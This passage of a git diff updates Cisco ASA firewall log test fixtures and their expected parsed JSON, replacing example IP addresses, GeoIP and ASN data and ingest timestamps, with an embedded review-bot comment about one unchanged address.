@@ -5256,24 +5205,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5301,7 +5250,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5311,8 +5260,8 @@ "event": { "severity": 6, "action": "created", - "ingested": "2021-07-19T09:05:57.086630778Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.", + "ingested": "2021-12-09T13:31:25.163275700Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "code": "602303", "outcome": "success" }, @@ -5334,24 +5283,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" 
@@ -5379,7 +5328,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5388,8 +5337,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086632521Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.", + "ingested": "2021-12-09T13:31:25.163281300Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.", "code": "602304", "kind": "event", "action": "deleted", @@ -5423,25 +5372,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5464,7 +5413,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5474,8 +5423,8 @@ "event": { "severity": 5, "reason": "Received a IKE_INIT_SA request", - "ingested": "2021-07-19T09:05:57.086634297Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", + "ingested": "2021-12-09T13:31:25.163287900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", "code": "750002", "kind": "event", "action": "connection-started", 
@@ -5506,25 +5455,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5547,7 +5496,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5557,8 +5506,8 @@ "event": { "severity": 4, "reason": "Negotiation aborted due to Failed to locate an item in the database", - "ingested": "2021-07-19T09:05:57.086635947Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", + "ingested": "2021-12-09T13:31:25.163292700Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", "code": "750003", "kind": "event", "action": "error", @@ -5581,17 +5530,8 @@ "level": "notification" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5611,7 +5551,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { 
@@ -5620,8 +5560,8 @@ "event": { "severity": 5, "reason": "PHASE 2 COMPLETED", - "ingested": "2021-07-19T09:05:57.086637615Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", + "ingested": "2021-12-09T13:31:25.163296900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", "code": "713120", "kind": "event", "action": "firewall-rule", @@ -5644,17 +5584,8 @@ "level": "notification" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.64.157.61", - "ip": "192.64.157.61" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "tags": [ "preserve_original_event" @@ -5674,7 +5605,7 @@ "dev01" ], "ip": [ - "192.64.157.61" + "192.168.157.61" ] }, "host": { @@ -5683,8 +5614,8 @@ "event": { "severity": 5, "reason": "Duplicate first packet detected", - "ingested": "2021-07-19T09:05:57.086639319Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.", + "ingested": "2021-12-09T13:31:25.163341Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.", "code": "713202", "kind": "event", "action": "firewall-rule", @@ -5704,17 +5635,8 @@ "level": "informational" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5734,7 +5656,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { 
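Review bot: The `Group = 100.60.140.10` value on the new side of the 713120 `event.original` (and again in the 7139xx messages that follow) is left as a third-party address while the neighbouring `IP = 192.128.1.1` was moved to 192.168.1.1; 100.60.0.0/16 is outside both RFC 1918 and the 100.64.0.0/10 shared address space, so it is the same kind of routable IP the rest of this diff replaces with 81.2.69.144 or private ranges. It does not seem to be extracted as an IP field here (`related.ip` on the new side lists only 192.168.1.1), so no GeoIP lookup depends on it, but the fixture remains inconsistent. Because this expected file is regenerated from the test-asa.log input, the change belongs in that log line, e.g. `Group = 192.0.2.10, IP = 192.168.1.1` (RFC 5737 TEST-NET-1) or an address inside 100.64.0.0/10, followed by regenerating the expectations; the test-asa.log hunk begins later in this diff and runs past the visible range.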
@@ -5743,8 +5665,8 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-07-19T09:05:57.086641034Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "ingested": "2021-12-09T13:31:25.163350100Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713905", "kind": "event", "action": "error", @@ -5786,7 +5708,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-07-19T09:05:57.086642711Z", + "ingested": "2021-12-09T13:31:25.163355500Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!", "code": "713904", "kind": "event", @@ -5831,8 +5753,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086644442Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "ingested": "2021-12-09T13:31:25.163360800Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713903", "kind": "event", "action": "firewall-rule", @@ -5875,7 +5797,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-07-19T09:05:57.086646109Z", + "ingested": "2021-12-09T13:31:25.163365600Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!", "code": "713902", "kind": "event", 
@@ -5901,17 +5823,8 @@ "level": "informational" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5931,7 +5844,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { @@ -5940,8 +5853,8 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-07-19T09:05:57.086647796Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "ingested": "2021-12-09T13:31:25.163370900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713901", "kind": "event", "action": "error", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log index 80efe8a5553..a3745b40968 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log 
@@ -8,4 +8,4 @@ Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.2
 Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -> inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]
 Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\username) -> inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]
 Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -> inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]
-Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -> outside/1.2.33.40(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]
+Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -> outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json
index 66e6263b514..48c6d1a9356 100644
--- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json
+++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json
@@ -57,7 +57,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:01.498773141Z",
+ "ingested": "2021-12-09T13:31:35.036770200Z",
 "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)",
 "code": "302016",
 "kind": "event",
@@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:01.498779612Z", + "ingested": "2021-12-09T13:31:35.036793100Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:01.498781958Z", + "ingested": "2021-12-09T13:31:35.036798400Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:01.498783785Z", + "ingested": "2021-12-09T13:31:35.036803900Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:01.498789415Z", + "ingested": "2021-12-09T13:31:35.036832700Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", @@ -401,7 +401,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:01.498792593Z", + "ingested": "2021-12-09T13:31:35.036838Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-3-313008: Denied IPv6-ICMP type=134, code=0 from fe80::1ff:fe23:4567:890a on interface ISP1", "code": "313008", "kind": "event", 
@@ -471,7 +471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:01.498794471Z", + "ingested": "2021-12-09T13:31:35.036843Z", "original": "Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.255.0.206/8795 (10.255.0.206/8795) to identity:10.12.31.51/0 (10.12.31.51/0), ICMP id 295, ICMP type 8", "code": "313009", "kind": "event", @@ -545,7 +545,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:01.498796270Z", + "ingested": "2021-12-09T13:31:35.036865900Z", "original": "Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -615,7 +615,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:01.498798076Z", + "ingested": "2021-12-09T13:31:35.036871100Z", "original": "Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\\\username) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -688,7 +688,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:01.498799824Z", + "ingested": "2021-12-09T13:31:35.036875Z", "original": "Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -\u003e inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106102", "kind": "event", 
@@ -720,19 +720,26 @@ }, "destination": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-GD", - "country_name": "China", - "region_name": "Guangdong", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 113.25, - "lat": 23.1167 - }, - "country_iso_code": "CN" + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } }, - "address": "1.2.33.40", + "address": "81.2.69.144", "port": 8080, - "ip": "1.2.33.40" + "ip": "81.2.69.144" }, "source": { "port": 64321, @@ -771,13 +778,13 @@ ], "ip": [ "10.1.2.3", - "1.2.33.40" + "81.2.69.144" ] }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:01.498801541Z", - "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/1.2.33.40(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", + "ingested": "2021-12-09T13:31:35.036879900Z", + "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106103", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log index 9f0a0b8b598..5d21ffa5a9f 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log 
@@ -1,268 +1,268 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for 
outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: 